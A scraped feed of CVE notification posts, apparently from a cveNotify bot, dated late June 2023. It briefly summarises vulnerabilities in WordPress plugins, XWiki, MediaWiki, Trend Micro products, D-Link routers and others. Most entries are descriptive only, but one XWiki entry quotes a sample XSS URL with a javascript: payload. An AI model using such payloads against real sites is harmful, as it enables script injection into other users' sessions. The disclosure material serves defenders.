🚨 CVE-2022-24784Statamic is a Laravel and Git powered CMS. Before versions 3.2.39 and 3.3.2, it is possible to confirm a single character of a user's password hash using a specially crafted regular expression filter in the users endpoint of the REST API. Multiple such requests can eventually uncover the entire hash. The hash is not present in the response, however the presence or absence of a result confirms if the character is in the right position. The API has throttling enabled by default, making this a time intensive task. Both the REST API and the users endpoint need to be enabled, as they are disabled by default. The issue has been fixed in versions 3.2.39 and above, and 3.3.2 and above.🎖@cveNotify |
|
| 2023-06-30 20:58:15 |
🚨 CVE-2022-2405The WP Popup Builder WordPress plugin before 1.2.9 does not have authorisation and CSRF check in an AJAX action, allowing any authenticated users, such as subscribers to delete arbitrary Popup🎖@cveNotify |
|
| 2023-06-30 20:58:14 |
🚨 CVE-2022-24074Whale Bridge, a default extension in Whale browser before 3.12.129.18, allowed to receive any SendMessage request from the content script itself that could lead to controlling Whale Bridge if the rendering process compromises.🎖@cveNotify |
|
| 2023-06-30 20:58:13 |
🚨 CVE-2022-24774CycloneDX BOM Repository Server is a bill of materials (BOM) repository server for distributing CycloneDX BOMs. CycloneDX BOM Repository Server before version 2.0.1 has an improper input validation vulnerability leading to path traversal. A malicious user may potentially exploit this vulnerability to create arbitrary directories or a denial of service by deleting arbitrary directories. The vulnerability is resolved in version 2.0.1. The vulnerability is not exploitable with the default configuration with the post and delete methods disabled. This can be configured by modifying the `appsettings.json` file, or alternatively, setting the environment variables `ALLOWEDMETHODS__POST` and `ALLOWEDMETHODS__DELETE` to `false`.🎖@cveNotify |
|
| 2023-06-30 18:58:36 |
🚨 CVE-2021-22864A remote code execution vulnerability was identified in GitHub Enterprise Server that could be exploited when building a GitHub Pages site. User-controlled configuration options used by GitHub Pages were not sufficiently restricted and made it possible to override environment variables leading to code execution on the GitHub Enterprise Server instance. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.0.3 and was fixed in 3.0.3, 2.22.9, and 2.21.17. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2023-06-30 18:58:35 |
🚨 CVE-2021-20268An out-of-bounds access flaw was found in the Linux kernel's implementation of the eBPF code verifier in the way a user running the eBPF script calls dev_map_init_map or sock_map_alloc. This flaw allows a local user to crash the system or possibly escalate their privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.🎖@cveNotify |
|
| 2023-06-30 18:58:34 |
🚨 CVE-2023-32320Nextcloud Server is a data storage system for Nextcloud, a self-hosted productivity platform. When multiple requests are sent in parallel, all of them were executed even if the amount of faulty requests succeeded the limit by the time the response was sent to the client. This allowed someone to send as many requests the server could handle in parallel to bruteforce protected details instead of the configured limit, default 8. Nextcloud Server versions 25.0.7 and 26.0.2 and Nextcloud Enterprise Server versions 21.0.9.12, 22.2.10.12, 23.0.12.7, 24.0.12.2, 25.0.7 and 26.0.2 contain patches for this issue.🎖@cveNotify |
|
| 2023-06-30 18:58:33 |
🚨 CVE-2023-3128Grafana is validating Azure AD accounts based on the email claim. On Azure AD, the profile email field is not unique and can be easily modified. This leads to account takeover and authentication bypass when Azure AD OAuth is configured with a multi-tenant app. 🎖@cveNotify |
|
| 2023-06-30 18:58:32 |
🚨 CVE-2021-23874Arbitrary Process Execution vulnerability in McAfee Total Protection (MTP) prior to 16.0.30 allows a local user to gain elevated privileges and execute arbitrary code bypassing MTP self-defense.🎖@cveNotify |
|
| 2023-06-30 18:58:30 |
🚨 CVE-2021-22923When curl is instructed to get content using the metalink feature, and a user name and password are used to download the metalink XML file, those same credentials are then subsequently passed on to each of the servers from which curl will download or try to download the contents from. Often contrary to the user's expectations and intentions and without telling the user it happened.🎖@cveNotify |
|
| 2023-06-30 18:58:29 |
🚨 CVE-2021-26314Potential floating point value injection in all supported CPU products, in conjunction with software vulnerabilities relating to speculative execution with incorrect floating point results, may cause the use of incorrect data from FPVI and may result in data leakage.🎖@cveNotify |
|
| 2023-06-30 18:58:25 |
🚨 CVE-2021-27499Ypsomed mylife Cloud, mylife Mobile Application, Ypsomed mylife Cloud: All versions prior to 1.7.2, Ypsomed mylife App: All versions prior to 1.7.5,The application layer encryption of the communication protocol between the Ypsomed mylife App and mylife Cloud uses non-random IVs, which allows man-in-the-middle attackers to tamper with messages.🎖@cveNotify |
|
| 2023-06-30 18:58:24 |
🚨 CVE-2021-24209The WP Super Cache WordPress plugin before 1.7.2 was affected by an authenticated (admin+) RCE in the settings page due to input validation failure and weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection.🎖@cveNotify |
|
| 2023-06-30 18:58:23 |
🚨 CVE-2023-2744The ERP WordPress plugin before 1.12.4 does not properly sanitise and escape the `type` parameter in the `erp/v1/accounting/v1/people` REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.🎖@cveNotify |
|
| 2023-06-30 18:58:19 |
🚨 CVE-2023-2743The ERP WordPress plugin before 1.12.4 does not sanitise and escape the employee_name parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2023-06-30 18:58:18 |
🚨 CVE-2023-36193Gifsicle v1.9.3 was discovered to contain a heap buffer overflow via the ambiguity_error component at /src/clp.c.🎖@cveNotify |
|
| 2023-06-30 18:58:17 |
🚨 CVE-2023-37302An issue was discovered in SiteLinksView.php in Wikibase in MediaWiki through 1.39.3. There is XSS via a crafted badge title attribute. This is also related to lack of escaping in wbTemplate (from resources/wikibase/templates.js) for quotes (which can be in a title attribute).🎖@cveNotify |
|
| 2023-06-30 16:58:31 |
🚨 CVE-2023-32527Trend Micro Mobile Security (Enterprise) 9.8 SP5 contains vulnerable .php files that could allow a remote attacker to execute arbitrary code on affected installations.Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.This is similar to, but not identical to CVE-2023-32528.🎖@cveNotify |
|
| 2023-06-30 16:58:30 |
🚨 CVE-2023-28800When using local accounts for administration, the redirect url parameter was not encoded correctly, allowing for an XSS attack providing admin login.🎖@cveNotify |
|
| 2023-06-30 16:58:29 |
🚨 CVE-2023-32532Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.This is similar to, but not identical to CVE-2023-32531 through 32535.🎖@cveNotify |
|
| 2023-06-30 16:58:25 |
🚨 CVE-2023-32534Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.This is similar to, but not identical to CVE-2023-32531 through 32535.🎖@cveNotify |
|
| 2023-06-30 16:58:24 |
🚨 CVE-2023-32536Affected versions Trend Micro Apex Central (on-premise) are vulnerable to potential authenticated reflected cross-site scripting (XSS) attacks due to user input validation and sanitization issues. Please note: an attacker must first obtain authentication to Apex Central on the target system in order to exploit this vulnerability.This is similar to, but not identical to CVE-2023-32537.🎖@cveNotify |
|
| 2023-06-30 16:58:23 |
🚨 CVE-2023-32537Affected versions Trend Micro Apex Central (on-premise) are vulnerable to potential authenticated reflected cross-site scripting (XSS) attacks due to user input validation and sanitization issues. Please note: an attacker must first obtain authentication to Apex Central on the target system in order to exploit this vulnerability.This is similar to, but not identical to CVE-2023-32536.🎖@cveNotify |
|
| 2023-06-30 16:58:19 |
🚨 CVE-2023-32553An Improper access control vulnerability in Trend Micro Apex One and Apex One as a Service could allow an unauthenticated user under certain circumstances to disclose sensitive information on agents.This is similar to, but not identical to CVE-2023-32552.🎖@cveNotify |
|
| 2023-06-30 16:58:18 |
🚨 CVE-2023-32388A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in watchOS 9.5, iOS 15.7.6 and iPadOS 15.7.6, macOS Ventura 13.4, iOS 16.5 and iPadOS 16.5, macOS Big Sur 11.7.7, macOS Monterey 12.6.6. An app may be able to bypass Privacy preferences🎖@cveNotify |
|
| 2023-06-30 16:58:14 |
🚨 CVE-2023-34642KioWare for Windows through v8.33 was discovered to contain an incomplete blacklist filter for blocked dialog boxes on Windows 10. This issue can allow attackers to open a file dialog box via the function showDirectoryPicker() which can then be used to open an unprivileged command prompt.🎖@cveNotify |
|
| 2023-06-30 16:58:13 |
🚨 CVE-2023-29707Cross Site Scripting (XSS) vulnerability in GBCOM LAC WEB Control Center version lac-1.3.x, allows attackers to create an arbitrary device.🎖@cveNotify |
|
| 2023-06-30 13:58:17 |
🚨 CVE-2023-3479Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.🎖@cveNotify |
|
| 2023-06-30 13:58:16 |
🚨 CVE-2023-0342MongoDB Ops Manager Diagnostics Archive may not redact sensitive PEM key file password app settings. Archives do not include the PEM files themselves. This issue affects MongoDB Ops Manager v5.0 prior to 5.0.21 and MongoDB Ops Manager v6.0 prior to 6.0.12🎖@cveNotify |
|
| 2023-06-30 10:58:42 |
🚨 CVE-2023-3387The Lana Text to Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'lana_text_to_image' and 'lana_text_to_img' shortcode in versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-06-30 10:58:40 |
🚨 CVE-2023-3388The Beautiful Cookie Consent Banner for WordPress is vulnerable to Stored Cross-Site Scripting via the 'nsc_bar_content_href' parameter in versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. A partial patch was made available in 2.10.1 and the issue was fully patched in 2.10.2.🎖@cveNotify |
|
| 2023-06-30 10:58:39 |
🚨 CVE-2023-3394Session Fixation in GitHub repository fossbilling/fossbilling prior to 0.5.1.🎖@cveNotify |
|
| 2023-06-30 10:58:38 |
🚨 CVE-2023-32439A type confusion issue was addressed with improved checks. This issue is fixed in iOS 16.5.1 and iPadOS 16.5.1, Safari 16.5.1, macOS Ventura 13.4.1, iOS 15.7.7 and iPadOS 15.7.7. Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.🎖@cveNotify |
|
| 2023-06-30 10:58:37 |
🚨 CVE-2023-3393 Code Injection in GitHub repository fossbilling/fossbilling prior to 0.5.1.🎖@cveNotify |
|
| 2023-06-30 10:58:36 |
🚨 CVE-2023-3197The MStore API plugin for WordPress is vulnerable to Unauthenticated Blind SQL Injection via the 'id' parameter in versions up to, and including, 4.0.1 due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2023-06-30 10:58:35 |
🚨 CVE-2023-32435A memory corruption issue was addressed with improved state management. This issue is fixed in Safari 16.4, iOS 16.4 and iPadOS 16.4, macOS Ventura 13.3, iOS 15.7.7 and iPadOS 15.7.7. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.🎖@cveNotify |
|
| 2023-06-30 10:58:33 |
🚨 CVE-2023-1724Faveo Helpdesk Enterprise version 6.0.1 allows an attacker with agent permissions to perform privilege escalation on the application. This occurs because the application is vulnerable to stored XSS.🎖@cveNotify |
|
| 2023-06-30 10:58:32 |
🚨 CVE-2023-1722Yoga Class Registration System version 1.0 allows an administrator to execute commands on the server. This is possible because the application does not correctly validate the thumbnails of the classes uploaded by the administrators.🎖@cveNotify |
|
| 2023-06-30 10:58:31 |
🚨 CVE-2023-35150XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Starting in version 2.40m-2 and prior to versions 14.4.8, 14.10.4, and 15.0, any user with view rights on any document can execute code with programming rights, leading to remote code execution by crafting an url with a dangerous payload. The problem has been patched in XWiki 15.0, 14.10.4 and 14.4.8.🎖@cveNotify |
|
| 2023-06-30 10:58:30 |
🚨 CVE-2023-32400This issue was addressed with improved checks. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4, watchOS 9.5. Entitlements and privacy permissions granted to this app may be used by a malicious app🎖@cveNotify |
|
| 2023-06-30 10:58:29 |
🚨 CVE-2023-35151XWiki Platform is a generic wiki platform. Starting in version 7.3-milestone-1 and prior to versions 14.4.8, 14.10.6, and 15.1, ny user can call a REST endpoint and obtain the obfuscated passwords, even when the mail obfuscation is activated. The issue has been patched in XWiki 14.4.8, 14.10.6, and 15.1. There is no known workaround.🎖@cveNotify |
|
| 2023-06-30 10:58:28 |
🚨 CVE-2023-32402An out-of-bounds read was addressed with improved input validation. This issue is fixed in watchOS 9.5, macOS Ventura 13.4, Safari 16.5, tvOS 16.5, iOS 16.5 and iPadOS 16.5. Processing web content may disclose sensitive information🎖@cveNotify |
|
| 2023-06-30 10:58:27 |
🚨 CVE-2023-32415This issue was addressed with improved redaction of sensitive information. This issue is fixed in iOS 16.5 and iPadOS 16.5, macOS Ventura 13.4, tvOS 16.5. An app may be able to read sensitive location information🎖@cveNotify |
|
| 2023-06-30 10:58:25 |
🚨 CVE-2023-35156XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the delete template to perform a XSS, e.g. by using URL such as: > xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=delete.vm&xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 6.0-rc-1. The vulnerability has been patched in XWiki 14.10.6 and 15.1. Note that a partial patch has been provided in 14.10.5 but wasn't enough to entirely fix the vulnerability. 🎖@cveNotify |
|
| 2023-06-30 10:58:21 |
🚨 CVE-2023-28387"NewsPicks" App for Android versions 10.4.5 and earlier and "NewsPicks" App for iOS versions 10.4.2 and earlier use hard-coded credentials, which may allow a local attacker to analyze data in the app and to obtain API key for an external service.🎖@cveNotify |
|
| 2023-06-30 10:58:20 |
🚨 CVE-2023-3473A vulnerability, which was classified as critical, was found in Campcodes Retro Cellphone Online Store 1.0. Affected is an unknown function of the file /admin/edit_product.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-232752.🎖@cveNotify |
|
| 2023-06-30 10:58:19 |
🚨 CVE-2023-3474A vulnerability has been found in SimplePHPscripts Simple Blog 3.2 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. It is recommended to upgrade the affected component. The identifier VDB-232753 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-30 10:58:18 |
🚨 CVE-2023-3475A vulnerability was found in SimplePHPscripts Event Script 2.1 and classified as problematic. Affected by this issue is some unknown functionality of the file preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. It is recommended to upgrade the affected component. VDB-232754 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-06-30 10:58:17 |
🚨 CVE-2023-3476A vulnerability was found in SimplePHPscripts GuestBook Script 2.2. It has been classified as problematic. This affects an unknown part of the file preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-232755.🎖@cveNotify |
|
| 2023-06-30 05:58:36 |
🚨 CVE-2023-33733Reportlab up to v3.6.12 allows attackers to execute arbitrary code via supplying a crafted PDF file.🎖@cveNotify |
|
| 2023-06-30 05:58:34 |
🚨 CVE-2020-18432File Upload vulnerability in SEMCMS PHP 3.7 allows remote attackers to upload arbitrary files and gain escalated privileges.🎖@cveNotify |
|
| 2023-06-30 05:58:33 |
🚨 CVE-2023-2834The BookIt plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.3.7. This is due to insufficient verification on the user being supplied during booking an appointment through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.🎖@cveNotify |
|
| 2023-06-30 05:58:32 |
🚨 CVE-2023-33336Reflected cross site scripting (XSS) vulnerability was discovered in Sophos Web Appliance v4.3.9.1 that allows for arbitrary code to be inputted via the double quotes.🎖@cveNotify |
|
| 2023-06-30 05:58:31 |
🚨 CVE-2023-36347A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data.🎖@cveNotify |
|
| 2023-06-30 05:58:30 |
🚨 CVE-2023-3063The SP Project & Document Manager plugin for WordPress is vulnerable to Insecure Direct Object References in versions up to, and including, 4.67. This is due to the plugin providing user-controlled access to objects, letting a user bypass authorization and access system resources. This makes it possible for authenticated attackers with subscriber privileges or above, to change user passwords and potentially take over administrator accounts.🎖@cveNotify |
|
| 2023-06-30 05:58:29 |
🚨 CVE-2023-3249The Web3 – Crypto wallet Login & NFT token gating plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.6.0. This is due to incorrect authentication checking in the 'hidden_form_data' function. This makes it possible for authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.🎖@cveNotify |
|
| 2023-06-30 05:58:27 |
🚨 CVE-2023-36348POS Codekop v2.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the filename parameter.🎖@cveNotify |
|
| 2023-06-30 05:58:26 |
🚨 CVE-2023-36345A Cross-Site Request Forgery (CSRF) in POS Codekop v2.0 allows attackers to escalate privileges.🎖@cveNotify |
|
| 2023-06-30 05:58:25 |
🚨 CVE-2023-36346POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.🎖@cveNotify |
|
| 2023-06-30 05:58:24 |
🚨 CVE-2022-47184Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Traffic Server.This issue affects Apache Traffic Server: 8.0.0 to 9.2.0.🎖@cveNotify |
|
| 2023-06-30 05:58:23 |
🚨 CVE-2023-30631Improper Input Validation vulnerability in Apache Software Foundation Apache Traffic Server. The configuration option proxy.config.http.push_method_enabled didn't function. However, by default the PUSH method is blocked in the ip_allow configuration file.This issue affects Apache Traffic Server: from 8.0.0 through 9.2.0.8.x users should upgrade to 8.1.7 or later versions9.x users should upgrade to 9.2.1 or later versions🎖@cveNotify |
|
| 2023-06-30 05:58:21 |
🚨 CVE-2023-33933Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Traffic Server.This issue affects Apache Traffic Server: from 8.0.0 through 9.2.0.8.x users should upgrade to 8.1.7 or later versions9.x users should upgrade to 9.2.1 or later versions🎖@cveNotify |
|
| 2023-06-30 05:58:20 |
🚨 CVE-2023-36143Maxprint Maxlink 1200G v3.4.11E has an OS command injection vulnerability in the "Diagnostic tool" functionality of the device.🎖@cveNotify |
|
| 2023-06-30 05:58:19 |
🚨 CVE-2023-36146A Stored Cross-Site Scripting (XSS) vulnerability was found in Multilaser RE 170 using firmware 2.2.6733.🎖@cveNotify |
|
| 2023-06-30 05:58:18 |
🚨 CVE-2023-3469Cross-site Scripting (XSS) - Reflected in GitHub repository thorsten/phpmyfaq prior to 3.2.0-beta.2.🎖@cveNotify |
|
| 2023-06-30 05:58:17 |
🚨 CVE-2023-34641KioWare for Windows through v8.33 was discovered to contain an incomplete blacklist filter for blocked dialog boxes on Windows 10. This issue can allow attackers to open a file dialog box via the function window.print() which can then be used to open an unprivileged command prompt.🎖@cveNotify |
|
| 2023-06-30 05:58:16 |
🚨 CVE-2023-2747The initialization vector (IV) used by the secure engine (SE) for encrypting data stored in the SE flash memory is uninitialized. 🎖@cveNotify |
|
| 2023-06-30 05:58:15 |
🚨 CVE-2023-2686Buffer overflow in Wi-Fi Commissioning MicriumOS example in Silicon Labs Gecko SDK v4.2.3 or earlier allows connected device to write payload onto the stack.🎖@cveNotify |
|
| 2023-06-30 05:58:14 |
🚨 CVE-2023-28809Some access control products are vulnerable to a session hijacking attack because the product does not update the session ID after a user successfully logs in. To exploit the vulnerability, attackers have to request the session ID at the same time as a valid user logs in, and gain device operation permissions by forging the IP and session ID of an authenticated user.🎖@cveNotify |
|
| 2023-06-29 20:58:42 |
🚨 CVE-2023-30946A security defect was identified in Foundry Issues. If a user was added to an issue on a resource that they did not have access to and consequently could not see, they could query Foundry's Notification API and receive metadata about the issue including the RID of the issue, severity, internal UUID of the author, and the user-defined title of the issue.🎖@cveNotify |
|
| 2023-06-29 20:58:41 |
🚨 CVE-2023-30955A security defect was identified in Foundry workspace-server that enabled a user to bypass an authorization check and view settings related to 'Developer Mode'. This enabled users with insufficient privilege the ability to view and interact with Developer Mode settings in a limited capacity. A fix was deployed with workspace-server 7.7.0.🎖@cveNotify |
|
| 2023-06-29 20:58:40 |
🚨 CVE-2023-33190Sealos is an open source cloud operating system distribution based on the Kubernetes kernel. In versions of Sealos prior to 4.2.0 an improper configuration of role based access control (RBAC) permissions resulted in an attacker being able to obtain cluster control permissions, which could control the entire cluster deployed with Sealos, as well as hundreds of pods and other resources within the cluster. This issue has been addressed in version 4.2.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-06-29 20:58:39 |
🚨 CVE-2023-36484ILIAS 7.21 and 8.0_beta1 through 8.2 is vulnerable to reflected Cross-Site Scripting (XSS).🎖@cveNotify |
|
| 2023-06-29 20:58:38 |
🚨 CVE-2023-36488ILIAS 7.21 and 8.0_beta1 through 8.2 is vulnerable to stored Cross Site Scripting (XSS).🎖@cveNotify |
|
| 2023-06-29 20:58:34 |
🚨 CVE-2023-3320The WP Sticky Social plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1. This is due to missing nonce validation in the ~/admin/views/admin.php file. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-06-29 20:58:33 |
🚨 CVE-2023-29931laravel-s 3.7.35 is vulnerable to Local File Inclusion via /src/Illuminate/Laravel.php.🎖@cveNotify |
|
| 2023-06-29 20:58:32 |
🚨 CVE-2023-26616D-Link DIR-823G firmware version 1.02B05 has a buffer overflow vulnerability, which originates from the URL field in SetParentsControlInfo.🎖@cveNotify |
|
| 2023-06-29 20:58:31 |
🚨 CVE-2023-33277The web interface of Gira Giersiepen Gira KNX/IP-Router 3.1.3683.0 and 3.3.8.0 allows a remote attacker to read sensitive files via directory-traversal sequences in the URL.🎖@cveNotify |
|
| 2023-06-29 20:58:27 |
🚨 CVE-2023-35830STW (aka Sensor-Technik Wiedemann) TCG-4 Connectivity Module DeploymentPackage_v3.03r0-Impala and DeploymentPackage_v3.04r2-Jellyfish and TCG-4lite Connectivity Module DeploymentPackage_v3.04r2-Jellyfish allow an attacker to gain full remote access with root privileges without the need for authentication, giving an attacker arbitrary remote code execution over LTE / 4G network via SMS.🎖@cveNotify |
|
| 2023-06-29 20:58:26 |
🚨 CVE-2023-37251An issue was discovered in the GoogleAnalyticsMetrics extension for MediaWiki through 1.39.3. The googleanalyticstrackurl parser function does not properly escape JavaScript in the onclick handler and does not prevent use of javascript: URLs.🎖@cveNotify |
|
| 2023-06-29 20:58:25 |
🚨 CVE-2023-37254An issue was discovered in the Cargo extension for MediaWiki through 1.39.3. XSS can occur in Special:CargoQuery via a crafted page item when using the default format.🎖@cveNotify |
|
| 2023-06-29 20:58:24 |
🚨 CVE-2023-37255An issue was discovered in the CheckUser extension for MediaWiki through 1.39.3. In Special:CheckUser, a check of the "get edits" type is vulnerable to HTML injection through the User-Agent HTTP request header.🎖@cveNotify |
|
| 2023-06-29 20:58:23 |
🚨 CVE-2023-37256An issue was discovered in the Cargo extension for MediaWiki through 1.39.3. It allows one to store javascript: URLs in URL fields, and automatically links these URLs.🎖@cveNotify |
|
| 2023-06-29 20:58:19 |
🚨 CVE-2023-26085A possible out-of-bounds read and write (due to an improper length check of shared memory) was discovered in Arm NN Android-NN-Driver before 23.02.🎖@cveNotify |
|
| 2023-06-29 20:58:18 |
🚨 CVE-2023-36487The password reset function in ILIAS 7.0_beta1 through 7.20 and 8.0_beta1 through 8.1 allows remote attackers to take over the account.🎖@cveNotify |
|
| 2023-06-29 20:58:17 |
🚨 CVE-2023-26612D-Link DIR-823G firmware version 1.02B05 has a buffer overflow vulnerability, which originates from the HostName field in SetParentsControlInfo.🎖@cveNotify |
|
| 2023-06-29 20:58:16 |
🚨 CVE-2023-26613An OS command injection vulnerability in D-Link DIR-823G firmware version 1.02B05 allows unauthorized attackers to execute arbitrary operating system commands via a crafted get request to excu_shel.🎖@cveNotify |
|
| 2023-06-29 18:58:37 |
🚨 CVE-2023-2907Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Marksoft allows SQL Injection.This issue affects Marksoft: through Mobile:v.7.1.7 ; Login:1.4 ; API:20230605.🎖@cveNotify |
|
| 2023-06-29 18:58:36 |
🚨 CVE-2023-3306A vulnerability was found in Ruijie RG-EW1200G EW_3.0(1)B11P204. It has been declared as critical. This vulnerability affects unknown code of the file app.09df2a9e44ab48766f5f.js of the component Admin Password Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-231802 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-06-29 18:58:35 |
🚨 CVE-2022-35692Adobe Commerce versions 2.4.3-p2 (and earlier), 2.3.7-p3 (and earlier) and 2.4.4 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to leak minor information of another user's account detials. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-06-29 18:58:34 |
🚨 CVE-2022-35928AES Crypt is a file encryption software for multiple platforms. AES Crypt for Linux built using the source on GitHub and having the version number 3.11 has a vulnerability with respect to reading user-provided passwords and confirmations via command-line prompts. Passwords lengths were not checked before being read. This vulnerability may lead to buffer overruns. This does _not_ affect source code found on aescrypt.com, nor is the vulnerability present when providing a password or a key via the `-p` or `-k` command-line options. The problem was fixed via in commit 68761851b and will be included in release 3.16. Users are advised to upgrade. Users unable to upgrade should us the `-p` or `-k` options to provide a password or key.🎖@cveNotify |
|
| 2023-06-29 18:58:30 |
🚨 CVE-2022-36063Azure RTOS USBx is a USB host, device, and on-the-go (OTG) embedded stack, fully integrated with Azure RTOS ThreadX and available for all Azure RTOS ThreadX–supported processors. Azure RTOS USBX implementation of host support for USB CDC ECM includes an integer underflow and a buffer overflow in the `_ux_host_class_cdc_ecm_mac_address_get` function which may be potentially exploited to achieve remote code execution or denial of service. Setting mac address string descriptor length to a `0` or `1` allows an attacker to introduce an integer underflow followed (string_length) by a buffer overflow of the `cdc_ecm -> ux_host_class_cdc_ecm_node_id` array. This may allow one to redirect the code execution flow or introduce a denial of service. The fix has been included in USBX release [6.1.12](https://github.com/azure-rtos/usbx/releases/tag/v6.1.12_rel). Improved mac address string descriptor length validation to check for unexpectedly small values may be used as a workaround.🎖@cveNotify |
|
| 2023-06-29 18:58:29 |
🚨 CVE-2022-36084cruddl is software for creating a GraphQL API for a database, using the GraphQL SDL to model a schema. If cruddl starting with version 1.1.0 and prior to versions 2.7.0 and 3.0.2 is used to generate a schema that uses `@flexSearchFulltext`, users of that schema may be able to inject arbitrary AQL queries that will be forwarded to and executed by ArangoDB. Schemas that do not use `@flexSearchFulltext` are not affected. The attacker needs to have `READ` permission to at least one root entity type that has `@flexSearchFulltext` enabled. The issue has been fixed in version 3.0.2 and in version 2.7.0 of cruddl. As a workaround, users can temporarily remove `@flexSearchFulltext` from their schemas.🎖@cveNotify |
|
| 2023-06-29 18:58:28 |
🚨 CVE-2023-26616D-Link DIR-823G firmware version 1.02B05 has a buffer overflow vulnerability, which originates from the URL field in SetParentsControlInfo.🎖@cveNotify |
|
| 2023-06-29 18:58:24 |
🚨 CVE-2023-35830STW (aka Sensor-Technik Wiedemann) TCG-4 Connectivity Module DeploymentPackage_v3.03r0-Impala and DeploymentPackage_v3.04r2-Jellyfish and TCG-4lite Connectivity Module DeploymentPackage_v3.04r2-Jellyfish allow an attacker to gain full remote access with root privileges without the need for authentication, giving an attacker arbitrary remote code execution over LTE / 4G network via SMS.🎖@cveNotify |
|
| 2023-06-29 18:58:23 |
🚨 CVE-2023-37254An issue was discovered in the Cargo extension for MediaWiki through 1.39.3. XSS can occur in Special:CargoQuery via a crafted page item when using the default format.🎖@cveNotify |
|
| 2023-06-29 18:58:22 |
🚨 CVE-2023-37255An issue was discovered in the CheckUser extension for MediaWiki through 1.39.3. In Special:CheckUser, a check of the "get edits" type is vulnerable to HTML injection through the User-Agent HTTP request header.🎖@cveNotify |
|
| 2023-06-29 18:58:18 |
🚨 CVE-2023-26612D-Link DIR-823G firmware version 1.02B05 has a buffer overflow vulnerability, which originates from the HostName field in SetParentsControlInfo.🎖@cveNotify |
|
| 2023-06-29 18:58:17 |
🚨 CVE-2023-31222Deserialization of untrusted data in Microsoft Messaging Queuing Service in Medtronic's Paceart Optima versions 1.11 and earlier on Windows allows an unauthorized user to impact a healthcare delivery organization’s Paceart Optima system cardiac device causing data to be deleted, stolen, or modified, or the Paceart Optima system being used for further network penetration via network connectivity.🎖@cveNotify |
|
| 2023-06-29 18:58:16 |
🚨 CVE-2023-2253A flaw was found in the `/v2/_catalog` endpoint in distribution/distribution, which accepts a parameter to control the maximum number of records returned (query string: `n`). This vulnerability allows a malicious user to submit an unreasonably large value for `n,` causing the allocation of a massive string array, possibly causing a denial of service through excessive use of memory.🎖@cveNotify |
|
| 2023-06-29 17:58:18 |
